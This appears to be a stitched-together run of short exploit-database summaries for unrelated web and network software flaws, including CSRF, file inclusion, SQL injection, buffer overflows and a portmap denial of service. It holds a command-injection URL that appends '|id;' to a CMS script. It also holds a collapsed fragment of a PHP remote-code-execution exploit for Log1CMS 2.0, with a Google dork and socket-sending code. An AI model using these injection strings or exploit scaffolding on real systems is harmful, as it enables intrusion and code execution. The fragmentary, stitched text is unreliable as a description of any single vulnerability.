The Pixie v1.04 blog post feature is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can create a crafted webpage that tricks a logged-in user into submitting a form on behalf of the attacker. This can lead to unauthorized actions being performed by the user without their knowledge or consent.
The Basic Analysis and Security Engine (BASE) version <= 1.2.4 is vulnerable to inclusion vulnerabilities. The vulnerabilities can be exploited by an attacker to include arbitrary files from remote servers, leading to potential remote code execution or information disclosure.
This exploit allows an attacker with upload rights and permissions to modify stories to execute arbitrary commands on the target system. The attacker can upload a file with a double extension and execute commands through it.
This exploit allows an attacker to execute commands remotely on the Family connections CMS v2.5.0-v2.7.1. The vulnerable code is present in the './dev/less.php' file. The exploit takes advantage of the 'register_globals' and 'register_argc_argv' PHP.ini settings. The exploit URL is 'http://192.168.220.128/[path]/dev/less.php?argv[1]=|id;'
The WSN Classifieds script version 6.2.12 and 6.2.18 is vulnerable to multiple vulnerabilities including Cross-Site Scripting (XSS) and SQL Injection. The XSS vulnerability allows an attacker to inject malicious scripts into the application, potentially leading to unauthorized access or data theft. The SQL Injection vulnerability allows an attacker to manipulate database queries, potentially leading to unauthorized access or data leakage.
Siemens Automation License Manager is vulnerable to a buffer overflow in the handling of the serialid field used in the *_licensekey commands, which can lead to code execution. Additionally, there are vulnerabilities that can be exploited to raise exceptions in the service.
This exploit allows an attacker to include arbitrary code from a remote location in the Nucleus CMS version 3.22 or earlier. The vulnerability exists in the PLUGINADMIN.php file in the nucleus/libs directory. The code checks for the existence of certain variables and includes them in the code execution process. By manipulating these variables, an attacker can execute arbitrary commands on the server.
+-----------------------------------------------------------++ Log1CMS 2.0(ajax_create_folder.php) Remote Code Execution ++-----------------------------------------------------------+Web-App : Log1CMS 2.0Vendor : http://log1cms.sourceforge.net/Vulnerability : Remote Code ExecutionAuthor : Adel SBMWebsite : www.The-code.tkFacebook : http://www.facebook.com/profile.php?id=100002938082057Google-Dork : "POWERED BY LOG1 CMS"Tested on : Windows XP SP2+-----------------------------------------------------------++ VIVE Algeria ++-----------------------------------------------------------+error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);function http_send($host, $packet){ if (!($sock = fsockopen($host, 80))) die( "n[-] No Response From {$host}:80n"); fwrite($sock, $packet); return stream_get_contents($sock);}print "n+------------------------------------------------------------------------+";print "n| Log1CMS 2.0 Remote Code Execution Exploit by Adel SBM |";print "n| SPl ThanX To: EgiX(exploit founder end coder)-The DoN |";print "n| Greetz to: Over-X & ind0ushka .. |";print "n| TeaM Official website: www.The-code.tk |";print "n| VIVE Algeria |";print "n+------------------------------------------------------------------------+n";if ($argc < 3){print "n+------------------------------------------------------------------------+";print "n| Usage......: php $argv[0] <host> <path> |";print "n| Example....: php $argv[0] localhost / |";print "n| Example....: php $argv[0] localhost /log1cms/ |";print "n+------------------------------------------------------------------------+n";}
This exploit causes a denial of service vulnerability in the portmap service on Linux. By sending a specially crafted request, an attacker can cause the service to crash, resulting in a denial of service condition. This vulnerability has been tested on Linux with version 5.
This code exploits a remote stack-based buffer overflow in the DECT dissector of wireshark. ROP chains aim to recover dynamically stack address, mprotect it and stack pivot to shellcode located in the payload. The process is automated and bypasses any NX/ALSR.